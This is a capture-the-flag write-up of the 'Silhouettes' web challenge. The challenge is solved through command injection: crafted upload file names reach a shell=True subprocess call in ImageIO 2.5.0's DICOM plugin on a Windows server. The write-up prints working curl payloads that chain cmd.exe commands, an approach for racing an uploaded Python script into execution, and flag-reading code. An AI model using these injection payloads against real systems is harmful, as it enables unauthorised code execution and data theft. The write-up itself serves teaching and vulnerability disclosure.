## Web - Silhouettes
This challenge is a simple web service that prints width and height of image
from uploaded file. "Upload" part is implemented in PHP:
die("file too large");
ini_set('max_execution_time', 15);
$name = "C:/upload/" . basename($_FILES["file"]["name"]);
move_uploaded_file($file["tmp_name"], $name);
system("python getsize.py ".escapeshellarg($name));
Extraction of width and height is implemented in Python (`getsize.py`):
import sys, imageio
assert imageio.__version__ == '2.5.0'
print('(w, h) =', imageio.imread(sys.argv[1]).shape[:2])
Web page also provides additional details about the software stack:
* Windows Server 2019 version 10.0.17763.0
* Python 3.7.4
* [ImageIO](https://github.com/imageio/imageio) 2.5.0
The first interesting thing that I noticed is that PHP script saves uploaded
images with user-provided file name in `C:/upload/`. Suspicious.
It looked like we may try to break in using some specially crafted
file, maybe also with specially crafted file name.
As a first step, I decided to examine the list of supported image formats:
[ImageIO documentation](https://imageio.readthedocs.io/en/v2.5.0/formats.html#single-images).
And the first thing that I noticed was the NPZ - "Numpy’s compressed array
format". I knew that Numpy is the Python library containing various math-related
primitives, like N-dimensional arrays, matrices, etc. And if it has the ability
to save data in files, quite possible that developers used some very simple
zero-effort way to implement this functionality. Like
[pickle](https://docs.python.org/3/library/pickle.html), which is well known to
allow execution of (almost) arbitrary code when unpickling.
It turned out that I was almost right.
really uses pickle to load arrays containing objects. But this functionality
[was disabled some time ago](https://github.com/numpy/numpy/commit/a4df7e51483c78853bb33814073498fb027aa9d4),
exactly because of obvious
[security concerns](https://nvd.nist.gov/vuln/detail/CVE-2019-6446).
I tried to upload NPZ file with serialized object to the service just to check
whether it uses old version of Numpy or not. It failed, which meant that server
is using updated version of Numpy, with `allow_pickle=False` by default. After
that, I tried to find possible flaw in Numpy's file array loading algorithm,
which potentially would allow me to bypass checks and involve pickle again.
After some time I realized that this was a dead end.
But we still have some weirdness in path and filename handling during upload,
right? Ability to upload files with known path/name on the server is not good,
bun not the vulnerability on its own. Specially crafted file name could be used
to inject shell commands, but to be exploitable, it have to be passed to
shell with improper escaping. I thought that this was unlikely, but still
decided to investigate. I had no other option anyway.
$ git clone https://github.com/imageio/imageio
$ cd imageio
$ git checkout v2.5.0
$ git grep subpocess
$ git grep subprocess -- imageio
imageio/plugins/_tifffile.py:# subprocess
imageio/plugins/_tifffile.py: import subprocess # noqa: delayed import
imageio/plugins/_tifffile.py: out = subprocess.check_output([jhove, filename, '-m', 'TIFF-hul'])
imageio/plugins/dicom.py:import subprocess
imageio/plugins/dicom.py: subprocess.check_call([fname, "--version"], shell=True)
imageio/plugins/dicom.py: subprocess.check_call([exe, fname1, fname2], shell=True)
imageio/plugins/ffmpeg.py:import subprocess as sp
imageio/plugins/ffmpeg.py: # Start ffmpeg subprocess and get meta information
imageio/plugins/ffmpeg.py: # Close the current generator, and thereby terminate its subprocess
imageio/plugins/ffmpeg.py: # Read meta data. This start the generator (and ffmpeg subprocess)
imageio/plugins/ffmpeg.py: # Seed the generator (this is where the ffmpeg subprocess starts)
Oh my, `shell=True` in `dicom.py` looks dangerous!
After a closer look at `imageio/plugins/dicom.py` it turned out that there are
two kinds of DICOM files: uncompressed and JPEG-compressed. Uncompressed DICOM
files are supported natively by ImageIO and one of its dependencies, but
JPEG-compressed files require decompression by external CLI tool. And ImageIO
`subprocess.check_call(..., shell=True)` to uncompress such files before
Promising code path requires `dcmdjpeg.exe` to be installed, so I needed some
right files to test that this is really so on the server.
Quick googling gave this:
I chose one [random file](./dicom_jpeg) from that tarball and tried ImageIO on
it locally:
>>> import imageio
>>> imageio.imread('./dicom_jpeg').shape[:2]
--version: dcmdjpeg: command not found
imageio.plugins._dicom.CompressedDicom: The dicom reader can only read files with uncompressed image data - not '1.2.840.10008.' (JPEG). You can try using dcmtk or gdcm to convert the image.
Then I tried to upload it, and it worked! Web service was able to show some
(width, height), which meant that `dcmdjpeg.exe` is installed on the server
and exploitable code path is working.
I recalled some `cmd.exe` commands, which I used last time back in the
Windows XP days, and came up with following:
$ curl -F 'file=@dicom_jpeg;filename=x&dir&x' 'http://silhouettes.balsnctf.com/'
$dcmtk: dcmdjpeg v3.6.4 2018-11-29 $
dcmdjpeg: Decode JPEG-compressed DICOM file
Host type: AMD64-Windows
Character encoding: CP1252
Code page: 437 (OEM) / 1252 (ANSI)
External libraries used:
- ZLIB, Version 1.2.11
- IJG, Version 6b 27-Mar-1998 (modified)
$dcmtk: dcmdjpeg v3.6.4 2018-11-29 $
dcmdjpeg: Decode JPEG-compressed DICOM file
error: Missing parameter dcmfile-out
Volume in drive C has no label.
Volume Serial Number is C604-FB4A
Directory of C:\inetpub\wwwroot
09/25/2019 12:53 PM <DIR> .
09/25/2019 12:53 PM <DIR> ..
09/25/2019 12:57 PM 115 getsize.py
09/25/2019 02:42 PM 1,602 index.php
2 File(s) 1,717 bytes
2 Dir(s) 18,761,220,096 bytes free
Surprisingly, it worked even despite the fact I did not checked which characters
I'm allowed to use in the file name and which are prohibited.
It seemed that I was a step away from the flag, but... I'm a long time Linux
user and I have near zero experience with Windows. And I'm talking about
day-to-day usage, not about pwning =).
So, as the next step, I tried to understand which characters are allowed in the
file name. Here is the list of various "sanitizers" on my way to cmd.exe:
* PHP/`basename()` - eats `/`, `\` and anything before.
* PHP/`escapeshellarg()` - replaces `%`, `!` and `"` with spaces (` `); adds `"`
around the string.
* Python/`subprocess.list2cmdline()`: adds `"` around the argument if it
contains ` ` or `\t`; adds backslash before `"`.
* Windows filesystem: file creation fails if file name contains any of these:
`<>:"/\|?*`. File is created on FS before its name goes into `cmd.exe`, so this
should not fail if we want command to be executed.
But how to construct anything useful if we are not even able to use spaces in
our command? For example, how to execute `cd ..` to go upper in the directory
tree? I tried to google this, hoping that there is some special command that
could replace `cd ..`. Instead of finding special command, I learned that
argument parsing for internal commands is working really weird in `cmd.exe`.
Not only spaces and tabs, but also `,`, `;` and `=` may be used as an argument
separators. It turned out that commands like `cd..` are working as expected
even without any separator!
$ curl -F 'file=@dicom_jpeg;filename=x&cd..&cd..&dir&x' 'http://silhouettes.balsnctf.com/'
$dcmtk: dcmdjpeg v3.6.4 2018-11-29 $
dcmdjpeg: Decode JPEG-compressed DICOM file
Host type: AMD64-Windows
Character encoding: CP1252
Code page: 437 (OEM) / 1252 (ANSI)
External libraries used:
- ZLIB, Version 1.2.11
- IJG, Version 6b 27-Mar-1998 (modified)
$dcmtk: dcmdjpeg v3.6.4 2018-11-29 $
dcmdjpeg: Decode JPEG-compressed DICOM file
error: Missing parameter dcmfile-out
Volume in drive C has no label.
Volume Serial Number is C604-FB4A
Directory of C:\
11/14/2018 06:56 AM <DIR> EFI
11/07/2007 08:00 AM 17,734 eula.1028.txt
11/07/2007 08:00 AM 17,734 eula.1031.txt
11/07/2007 08:00 AM 10,134 eula.1033.txt
11/07/2007 08:00 AM 17,734 eula.1036.txt
11/07/2007 08:00 AM 17,734 eula.1040.txt
11/07/2007 08:00 AM 118 eula.1041.txt
11/07/2007 08:00 AM 17,734 eula.1042.txt
11/07/2007 08:00 AM 17,734 eula.2052.txt
11/07/2007 08:00 AM 17,734 eula.3082.txt
11/07/2007 08:00 AM 1,110 globdata.ini
09/25/2019 12:45 PM <DIR> inetpub
11/07/2007 08:03 AM 562,688 install.exe
11/07/2007 08:00 AM 843 install.ini
11/07/2007 08:03 AM 76,304 install.res.1028.dll
11/07/2007 08:03 AM 96,272 install.res.1031.dll
11/07/2007 08:03 AM 91,152 install.res.1033.dll
11/07/2007 08:03 AM 97,296 install.res.1036.dll
11/07/2007 08:03 AM 95,248 install.res.1040.dll
11/07/2007 08:03 AM 81,424 install.res.1041.dll
11/07/2007 08:03 AM 79,888 install.res.1042.dll
11/07/2007 08:03 AM 75,792 install.res.2052.dll
11/07/2007 08:03 AM 96,272 install.res.3082.dll
09/15/2018 07:19 AM <DIR> PerfLogs
09/25/2019 12:52 PM <DIR> Program Files
09/25/2019 12:52 PM <DIR> Program Files (x86)
09/25/2019 12:49 PM <DIR> Python37
10/05/2019 10:03 AM <DIR> upload
09/25/2019 12:55 PM <DIR> Users
11/07/2007 08:00 AM 5,686 vcredist.bmp
11/07/2007 08:09 AM 1,442,522 VC_RED.cab
11/07/2007 08:12 AM 232,960 VC_RED.MSI
09/25/2019 12:49 PM <DIR> Windows
09/25/2019 02:15 PM 41 F!ag#$%&'()+,-.;=@[]^_`{}~
25 File(s) 3,169,888 bytes
9 Dir(s) 18,757,046,272 bytes free
Oh, and here is the file containing our flag, by the way.
Now we just need to `cat` it. This should be easy, right? No, nothing in
Windows is easy! Actually, we already can easily read files with "convenient"
file names:
$ curl -F 'file=@dicom_jpeg;filename=x&cd..&cd..&type=eula.1041.txt&x' 'http://silhouettes.balsnctf.com/'
$dcmtk: dcmdjpeg v3.6.4 2018-11-29 $
??????????? ???????
But our real target is ``` F!ag#$%&'()+,-.;=@[]^_`{}~```, which contains all
characters that we are not able to use in our command.
I started to looking at documentation about how to use wildcards and globbing
in `cmd.exe`, but quickly realized that this is most probably impossible to
implement given the restriction on characters in the file name (`?` and `*` in
This slowed me down a bit. But, quickly after, I remembered that we are able to
upload files with any contents into known directory with known name onto the
server. And thus, we may upload some `evil.exe` and send command like
`cd..&cd..&cd=upload&evil.exe`, which gives the ability to execute arbitrary
code on the server, even remote shell.
This looked like a final step to reading the flag, but before writing any code,
I decided to quickly check that there are no more obstacles on my way:
$ curl -F 'file=@dicom_jpeg;filename=x&cd..&cd..&cd=upload&dir&x' 'http://silhouettes.balsnctf.com/'
$dcmtk: dcmdjpeg v3.6.4 2018-11-29 $
error: Missing parameter dcmfile-out
Wait, what? Where is the output of the last `dir`?
$ curl -F 'file=@dicom_jpeg;filename=x&cd..&cd..&echo=test1&cd=upload&echo=test2&x' 'http://silhouettes.balsnctf.com/'
$dcmtk: dcmdjpeg v3.6.4 2018-11-29 $
error: Missing parameter dcmfile-out
Yup, `cd upload` is not working, anything after it also fails. But why? This
took me some time to understand. There is a separate permission bit in NTFS:
`List folder contents`. It seems that server process has permissions to
create/read/write/delete files in `C:/upload/`, but not to obtain the list of
files there. And it seems that missing `List folder contents` permission
somehow breaks `cmd.exe` and it stops executing subsequent commands even if they
do not require any directory/file access (this is the only explanation of why
second `echo` from the last test was not working).
While uploading executable into `C:/upload/` still seemed viable, I needed
another plan to execute it. Using full path in the file name for file upload
is not an option because we can not use `/` and `\`. Yet again, it took some
time to realize that we already have `C:/upload/` in our command. PHP script
passes full path to the Python script, which, in turn, does something like this:
some.exe C:/upload/${fname} C:/upload/${fname}.raw
If we give it `evil.exe&` as a file name, `cmd.exe` will really execute this:
some.exe C:/upload/evil.exe& C:/upload/evil.exe&.raw
Now we are somewhere near the flag. Again =). It was pretty clear on how we
should proceed:
* One thread uploads `evil.exe` in endless loop.
* Another thread simultaneously tries to execute `evil.exe` on the server side,
until it succeeds.
But while all parts of the puzzle was already there, I still had few technical
problems to resolve.
The first one is: what `evil.exe` should really do and how to create it? It was
clear that it should contain something equivalent to `cat C:/*F*ag*`. At first
I was thinking about writing BAT script, but quickly rejected this idea because
this requires some knowledge of `cmd.exe`, which I'm still lacking. Next
option - compile EXE locally on Linux using mingw64 - was also rejected because
this requires Windows API knowledge which I do not have. Next obvious option
is Python. We already know that we have working Python there and we know that it
could be executed using just `python` without full path. This means that we may
use file name `evil.py&python` to get following command executed:
some.exe C:/upload/evil.py&python C:/upload/evil.py&python.raw
Looks nice and simple!
The second problem is: PHP script removes uploaded files immediately after
executing the Python script, so we have to hurry up to execute it. And it would
be nice to make processing of "execute evil.py" command faster, and to make
uploaded "evil.py" file live longer in `C:/upload`.
Original DICOM/JPEG image file was quite heavy: ~200KiB, so I tried to make it
smaller. It turned out that just [first 512 bytes](./dicom_jpeg.small) are
enough to trigger required code path inside the ImageIO. This makes the
"execute evil.py" cycle work with faster rate.
`getsize.py` is expected to immediately fail on uploaded Python script and this
is not good. We already know that ImageIO is able to execute `dcmdjpeg.exe`,
and this should be much slower than just discarding file based on simple file
header checks. So I just tried to attach python script to the 512 byte DICOM
header which I already had and then pass it to the Python interpreter.
Surprisingly, it worked without a single error. It looks like the
interpreter silently discards any garbage before first `\n`. Really do not know
why this happens, but this is definitely good for our case.
Finally, I wrote two Python scripts. First - [upload.py](./upload.py) - uploads
second script and tries to execute it on server. Second script is expected to
read flag from the server and print it. Here is how the first version of second
script looked like:
#!/usr/bin/env python3
import glob
fname = glob.glob('c:/*F*ag*')
if fname:
fname = fname[0]
with open(fname, 'r') as f:
print('GOT FLAG: ', f.read())
print('GOT FLAG (NO): open()')
print('GOT FLAG (NO): glob.glob()')
And it failed on `glob.glob()`... Because for sure the challenge would be too
easy if file name will not contain some non-printable characters between
Final version of [script](./reader.py) revealed the flag itself and the file
fname: "c:/\x7f F\x7f!\x7fa\x7fg\x7f#\x7f$\x7f%\x7f&\x7f'\x7f(\x7f)\x7f+\x7f,\x7f-\x7f.\x7f;\x7f=\x7f@\x7f[\x7f]\x7f^\x7f_\x7f`\x7f{\x7f}\x7f~\x7f"
By the way, this was real 0day vulnerability which was fixed few hours after
the competition ended: https://github.com/imageio/imageio/pull/483.